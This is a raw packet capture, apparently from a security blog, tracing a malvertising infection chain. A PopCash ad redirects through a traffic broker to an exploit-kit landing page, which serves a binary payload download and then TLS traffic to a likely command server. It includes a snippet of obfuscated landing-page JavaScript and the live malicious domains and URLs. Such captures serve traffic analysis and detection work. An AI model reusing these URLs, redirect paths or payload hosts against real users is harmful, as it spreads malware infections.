2020-02-19 19:23:32.510874 IP 192.168.4.239.49481 > 3.226.77.126.80: Flags [P.], seq 1:259, ack 1, win 258, length 258: HTTP: GET /go/141657/437555 HTTP/1.1
E..*”.@………..M~.I.P….U.$.P….e..GET /go/141657/437555 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: ps.popcash.net
Connection: Keep-Alive
2020-02-19 19:23:32.511531 IP 192.168.4.239.49482 > 3.226.77.126.80: Flags [.], ack 1, win 258, length 0
E..(“.@………..M~.J.P]L.$CG..P………….
2020-02-19 19:23:32.754783 IP 3.226.77.126.80 > 192.168.4.239.49481: Flags [.], ack 259, win 237, length 0
E..(..@.?.…M~…..P.IU.$…..P….%.. 2020-02-19 19:23:33.299047 IP 3.226.77.126.80 > 192.168.4.239.49481: Flags [P.], seq 1:485, ack 259, win 237, length 484: HTTP: HTTP/1.1 200 OK E…..@.?.(..M~…..P.IU.$…..P…….HTTP/1.1 200 OK
Date: Wed, 19 Feb 2020 23:23:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Vary: Accept-Encoding
Content-Encoding: gzip
106
2020-02-19 19:23:33.352360 IP 192.168.4.239.49481 > 3.226.77.126.80: Flags [P.], seq 259:610, ack 485, win 257, length 351: HTTP: GET /ad/ad?p=141657&w=437555&t=c4e2c17140489e34&r=&vw=1024&vh=674 HTTP/1.1
E…”.@………..M~.I.P….U.&.P….,..GET /ad/ad?p=141657&w=437555&t=c4e2c17140489e34&r=&vw=1024&vh=674 HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Referer: http://ps.popcash.net/go/141657/437555
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: ps.popcash.net
Connection: Keep-Alive
2020-02-19 19:23:33.593011 IP 3.226.77.126.80 > 192.168.4.239.49481: Flags [.], ack 610, win 245, length 0
E..(..@.?.*…M~…..P.IU.&…..P…….
2020-02-19 19:23:34.186865 IP 3.226.77.126.80 > 192.168.4.239.49481: Flags [P.], seq 485:1053, ack 610, win 245, length 568: HTTP: HTTP/1.1 303 See Other
E....@.?.'...M~.....P.IU.&.....P...…HTTP/1.1 303 See Other
Date: Wed, 19 Feb 2020 23:23:33 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 224
Connection: keep-alive
Server: nginx
Location: http://synth.website/3v1qk8qwd3fsdfg4?keyword=Other&cost=0.00201¤cy=USD&external_id=76317964614&ad_campaign_id=257385&source=popcash&sub_id_1=437555&sub_id_2=Other
2020-02-19 19:23:35.386396 IP 192.168.4.239.49485 > 188.127.249.55.80: Flags [P.], seq 1:439, ack 1, win 258, length 438: HTTP: GET /
3v1qk8qwd3fsdfg4?keyword=Other&cost=0.00201¤cy=USD&external_id=76317964614&ad_campaign_id=257385&source=popcash&sub_id_1=437555
&sub_id_2=Other HTTP/1.1
E…#.@…Z……..7.M.P.{#…G.P…….GET /3v1qk8qwd3fsdfg4?keyword=Other&cost=0.00201¤cy=USD&external_id=76317964614&ad_campaign_id=257385&source=popcash&sub_id_1=437555&sub_id_2=Other HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Referer: http://ps.popcash.net/go/141657/437555
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: synth.website
2020-02-19 19:23:35.387016 IP 192.168.4.239.49486 > 188.127.249.55.80: Flags [.], ack 1, win 258, length 0
E..(#.@…\y…….7.N.P.<.4.G..P….|…….. 2020-02-19 19:23:35.628706 IP 188.127.249.55.80 > 192.168.4.239.49485: Flags [.], ack 439, win 237, length 0
E..(. @.?..a…7…..P.M..G..{%RP…9…
2020-02-19 19:23:36.440209 IP 188.127.249.55.80 > 192.168.4.239.49485: Flags [P.], seq 1:1022, ack 439, win 237, length 1021: HTTP: HTTP/1.1 302 Found
E..%.!@.?..c…7…..P.M..G..{%RP…….HTTP/1.1 302 Found
Server: nginx
Date: Wed, 19 Feb 2020 23:23:35 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Cache-Control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0
Expires: 0
Last-Modified: Wed, 19 Feb 2020 23:23:35 GMT
Location: http://keli.adultessvensk.info/17rh2ccau1jrsid/bolivia-crystal-bikini
Pragma: no-cache
Set-Cookie: _subid=17rh2ccau1jrsid;Expires=Saturday, 21-Mar-2020 23:23:35 GMT;Max-Age=2678400;Path=/
Set-Cookie: 506ef=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjIxNlwiOjE1ODIxNTQ2MTUsXCIzODdcIjoxNTgyMTU0NjE1fSxcImNhbXBhaWduc1wiOntcIjM1XCI6MTU4MjE1NDYxNSxcIjI0XCI6MTU4MjE1NDYxNX0sXCJ0aW1lXCI6MTU4MjE1NDYxNX0ifQ.gTBkma-wFYGontS72ZtYJxogznbdHRY3YC9Win3HBps;Expires=Saturday, 21-Mar-2020 23:23:35 GMT;Max-Age=2678400;Path=/
2020-02-19 19:23:37.681552 IP 192.168.4.239.49487 > 185.159.80.223.80: Flags [P.], seq 1:339, ack 1, win 258, length 338: HTTP: GET /
17rh2ccau1jrsid/bolivia-crystal-bikini HTTP/1.1
E..z#.@….O……P..O.Pob.’..o9P…G…GET /17rh2ccau1jrsid/bolivia-crystal-bikini HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Referer: http://ps.popcash.net/go/141657/437555
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: keli.adultessvensk.info
2020-02-19 19:23:37.682097 IP 192.168.4.239.49488 > 185.159.80.223.80: Flags [.], ack 1, win 258, length 0
E..(#.@………..P..P.PoB.3.m.&P………….
2020-02-19 19:23:37.923817 IP 185.159.80.223.80 > 192.168.4.239.49487: Flags [.], ack 339, win 237, length 0
E..(.5@.?…..P……P.O..o9ob.yP….?..
2020-02-19 19:23:38.553794 IP 185.159.80.223.80 > 192.168.4.239.49487: Flags [.], seq 1:1327, ack 339, win 237, length 1326: HTTP: HTTP/1.1 200 OK
E..V.6@.?..U..P……P.O..o9ob.yP…….HTTP/1.1 200 OK
Date: Wed, 19 Feb 2020 23:23:37 GMT
Server: Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/5.4.16
X-Powered-By: PHP/5.4.16
P3P: CP=”NOI ADM DEV COM NAV OUR STP”
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
2020-02-19 19:23:40.682556 IP 185.159.80.223.80 > 192.168.4.239.49487: Flags [P.], seq 79108:79362, ack 723, win 245, length 254: HTT
P
E..&.x@.?..C..P……P.O…<ob..P…….}
catch(fufuf)
{
try
{
S(z);
}
catch (gju)
{
redir(“http://keli.adultessvensk.info/?dfe1f19d3cef7d6e8e6d8caa13b6be14u”)
}
redir(“http://keli.adultessvensk.info/?dfe1f19d3cef7d6e8e6d8caa13b6be14u”)
};
0
2020-02-19 19:23:40.682871 IP 192.168.4.239.49487 > 185.159.80.223.80: Flags [.], ack 79362, win 258, length 0
E..(#M@….m……P..O.Pob…..:P………….
2020-02-19 19:23:40.809916 IP 192.168.4.239.49487 > 185.159.80.223.80: Flags [P.], seq 723:1212, ack 79362, win 258, length 489: HTTP: POST /17rh2ccau1jrsid/?e975da3dfc774fc8a654e1dd23e51a48fe6205y HTTP/1.1
E…#N@………..P..O.Pob…..:P…….POST /17rh2ccau1jrsid/?e975da3dfc774fc8a654e1dd23e51a48fe6205y HTTP/1.1
Host: keli.adultessvensk.info
Content-Length: 320
Cache-Control: no-cache
Cookie: __vbs=1
2020-02-19 19:23:40.809916 IP 192.168.4.239.49487 > 185.159.80.223.80: Flags [P.], seq 723:1212, ack 79362, win 258, length 489: HTTP
: POST /17rh2ccau1jrsid/?e975da3dfc774fc8a654e1dd23e51a48fe6205y HTTP/1.1
E…#N@………..P..O.Pob…..:P…….POST /17rh2ccau1jrsid/?e975da3dfc774fc8a654e1dd23e51a48fe6205y HTTP/1.1
Host: keli.adultessvensk.info
Content-Length: 320
Cache-Control: no-cache
Cookie: __vbs=1
……………………. ..8lg..
-..z.^…..…….cc..J.. v..Z….t.:Z…Z…Z…Z…Z…..].Z…h…Z… V….b: z2….9.”h….g….Z……T b…g.r….Z…..FZ…..B. zz^.9d……I. ……..Vi………. ..](2…2…..T<..H.e-G.u2H..T^c.6sG{…m.. .lo.%’.Ox….:..rJ.x..e8….E.v%..ou.T.”..…….]…&… .^PI
2020-02-19 19:23:41.051083 IP 185.159.80.223.80 > 192.168.4.239.49487: Flags [.], ack 1212, win 254, length 0
E..(.y@.?..@..P……P.O…:ob..P…….
2020-02-19 19:23:41.341860 IP 192.168.4.239.137 > 188.127.249.55.137: NBT UDP PACKET(137): QUERY; REQUEST; UNICAST
E..N#O@….…….7…..:]…………. CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..!..
2020-02-19 19:23:41.378226 IP 185.159.80.223.80 > 192.168.4.239.49487: Flags [.], seq 79362:80688, ack 1212, win 254, length 1326: HTTP: HTTP/1.1 200 OK
E..V.z@.?…..P……P.O…:ob..P…)m..HTTP/1.1 200 OK
Date: Wed, 19 Feb 2020 23:23:40 GMT
Server: Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Length: 431358
Content-Type: application/octet-stream
2020-02-19 19:23:46.640532 IP 192.168.4.239.49487 > 185.159.80.223.80: Flags [P.], seq 1212:1391, ack 511040, win 258, length 179: HTTP: POST /17rh2ccau1jrsid/?e975da3dfc774fc8a654e1dd23e51a48fe6205y&00000111&11 HTTP/1.1
E…$v@………..P..O.Pob….;xP…….POST /17rh2ccau1jrsid/?e975da3dfc774fc8a654e1dd23e51a48fe6205y&00000111&11 HTTP/1.1
Host: keli.adultessvensk.info
Content-Length: 0
Cache-Control: no-cache
Cookie: __vbs=1
2020-02-19 19:23:46.881461 IP 185.159.80.223.80 > 192.168.4.239.49487: Flags [.], ack 1391, win 262, length 0
E..(..@.?…..P……P.O..;xob..P…….
2020-02-19 19:23:47.194702 IP 185.159.80.223.80 > 192.168.4.239.49487: Flags [P.], seq 511040:511513, ack 1391, win 262, length 473: HTTP: HTTP/1.1 404 Not Found
E…..@.?…..P……P.O..;xob..P…i…HTTP/1.1 404 Not Found
Date: Wed, 19 Feb 2020 23:23:46 GMT
Server: Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 259
Content-Type: text/html
E…$.@….Z….-….T..v……(P…k………….^M..’……….]..”d …G.Z.7JM^...<./.=.5…
.’…..+.#.,.$. .
.@.2.j.8…….I…………..vapershotz.xyz……….
…………………………….
2020-02-19 19:23:58.925578 IP 45.147.200.7.443 > 192.168.4.239.49492: Flags [.], seq 1:1327, ack 166, win 237, length 1326
E..V8.@.?.B.-……….T…(v…P………..]…Y…BO6a…x….H…^G..s,..Jv…o .….4=…L…….|.z.g….W…’……………
…….. … .. …X0..T0..<………………….}Il0.. *.H……..0J1.0 ..U….US1.0…U. ..Let’s Encrypt1#0!..U….Let’s Encrypt Authority X30…200211151423Z..200511151423Z0.1.0…U….vapershotz.xyz0..”0.. *.H………. …0.. ………..”.i’….!E..W……..>g..6.1v&.v.G:\WS….8.7……X@QL..y..L9r..zN’.<.6.&n.V.”@<.z2a..Fz.5o.4…#,O…..PC..s.x!…b&. .f..H…..’.Y<.x…..X…...?.B_.p...@..4@..kK........'.X;......vA.s0.$..v.d.1..l...W~...{.)MD*.|...e...o.h>y.F.;[..:E3..p.S.i.~.........c0.._0...U...........0...U.%..0...+.........+.......0...U.......0.0...U.......Y.Q....n]......SF$c0...U.#..0....Jjc.}....9..Ee.....0o..+........c0a0...+.....0.."http://ocsp.int-x3.letsencrypt.org0/..+.....0..#http://cert.int-x3.letsencrypt.org/0...U....0...vapershotz.xyz0L..U. .E0C0...g.....07..+..........0(0&..+.........http://cps.letsencrypt.org0.... +.....y............v.....7~.b....a...{7.V..&[...K.ATn...p5........G0E.!.....hT<.c...T..g.>...x}q...,..n3. 'y...8….=.)…..u…> .6%.(*..v……… N.f.+..% gk..p..IS-…^…p5……..G0E. …)..3.w.)a…\e..>9..g.Pj..@..!…..….XE……i.5B….{.c….0.. *.H………….y..7….T..~U=;.Np1..z..{P….)..A8…V….S.S…ZP6.3..*[.i..c….u 41.x..y..6:.R^…~.9`.x….\7.w
2020-02-19 19:23:58.925805 IP 45.147.200.7.443 > 192.168.4.239.49492: Flags [.], seq 1327:2653, ack 166, win 237, length 1326
E..V8.@.?.B.-……….T…Vv…P….t..r4ejI..Nh..=…3Q.n..%..{..M……@,..vF;~[.k..|W%.<t.=$..7.wQ.-$1….(.B]..L.U.^…SCN/]\?..1….=W…+_..fnZ.p…j$……..6sx.$……C..5.H. …..J.|..%…0…0..z…….
.AB…S.sj…..0.. *.H……..0?1$0″..U.
..Digital Signature Trust Co.1.0…U….DST Root CA X30…160317164046Z..210317164046Z0J1.0 ..U….US1.0…U.
Please follow and like us:
